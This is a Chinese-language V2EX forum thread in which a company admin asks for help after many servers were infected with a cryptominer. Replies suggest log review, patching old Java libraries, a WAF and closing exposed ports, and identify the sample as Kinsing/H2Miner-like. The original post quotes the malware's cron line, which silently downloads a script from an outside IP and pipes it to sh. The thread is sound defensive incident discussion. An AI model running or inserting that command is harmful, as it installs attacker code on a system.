公司服务器被攻击了!

2021-11-01 12:42:43 +08:00
 leiuu

周六公司服务器被大面积攻击,植入挖矿程序,cpu 被打爆。

怀疑是通过某个开源框架的远程执行漏洞进来的,但不知道是从具体哪个机器进入。

该病毒基本特征:

* * * * * wget -q -O - http://185.191.32.198/spr.sh |sh > /dev/null 2>&1

涉及的服务器很多,v 友们有什么好的分析思路分享吗?

9288 次点击
所在节点    信息安全
53 条回复
0x73346b757234
2021-11-01 16:39:20 +08:00
@leiuu 噢,是通过一些信息检索找到的。
做安全的可能这块相对熟悉一些,也只是个普通的安全从业者😂,建议你们部署一些主机安全设备加强防护。
podel
2021-11-01 18:00:41 +08:00
salt 也有可能。
chiuan
2021-11-01 18:03:22 +08:00
为什么不用云服务器。
Leao9203
2021-11-01 18:12:36 +08:00
@sudoy 部署到云服务器估计更难修...毕竟 CPU 被打爆,有时候连都连不上的
Rwing
2021-11-01 18:31:19 +08:00
抓紧破案,有结果了辛苦 at 我一下哈
cc9781
2021-11-01 18:44:39 +08:00
cc9781
2021-11-01 18:45:24 +08:00
@zhshj98282123 参考下, 如果主机有 web 服务的话, 看下 access 日志
leiuu
2021-11-01 19:25:38 +08:00
@chiuan 中招的里边有阿里云和腾讯云服务器。估计我们用的不规范吧。还在找原因。
leiuu
2021-11-01 19:28:58 +08:00
@sssbbb 怀疑是 jumperserver key 泄露了。但无证据。。。
leiuu
2021-11-01 20:04:01 +08:00
@046569 日志服务器的点子不错。后续有意搭建一个。thx 。
hefish
2021-11-01 20:32:16 +08:00
居然有用 root 跑的服务。。。
lamesbond
2021-11-01 21:52:22 +08:00
半年前也中了挖矿病毒,java 服务有漏洞,项目里的 shiro 和 databind 的版本太低了,后来更新版本后就好了。建议上 waf ,waf 会直接告诉你哪里有漏洞。
看看访问日志里有没有不正常的访问记录,我当时把 ip 一搜显示被举报的 ip
tiedan
2021-11-01 21:59:08 +08:00
hadoop?
SuperShuYe
2021-11-01 22:43:49 +08:00
@melsp 我们最近也是 lockbit
icepie
2021-11-01 23:18:17 +08:00
经历过一样的事情, 只因为 docker 开放了个端口出去
Borch
2021-11-01 23:21:52 +08:00
上百台服务器...服务器这么多公司都没有招安全类的工程师吗,搞个安全部门,平时渗透测试下
LudwigWS
2021-11-02 08:04:35 +08:00
如果是 Windows 能一键恢复就好了😊
Eytoyes
2021-11-02 08:41:53 +08:00
我个人思路的话:
1 、先把几个挖矿地址 ban 掉或者视情况把防火墙设置为国内访问,然后解除高占用进程,恢复服务;
2 、搭个测试环境,运行挖矿脚本,还原入侵过程
3 、根据入侵过程把对应的漏洞补上,根据脚本内容清理对应挖矿产生的文件

本人半路出家的,不知道正规处理是怎么个方式?
0x73346b757234
2021-11-02 10:01:50 +08:00
更新:

重新尝试分析了一下 kinsing ,发现与 H2Miner 黑产的样本高度相似。
腾讯安全同事去年分析过 H2Miner: https://s.tencent.com/research/report/976.html
你们这个应该跟这个基本上差不多,只是样本多了些别的功能,比如多了对 F5 RCE 漏洞的支持。
408ss
2021-11-02 10:03:17 +08:00
你们公司需要一些安全防护产品

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/812098

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX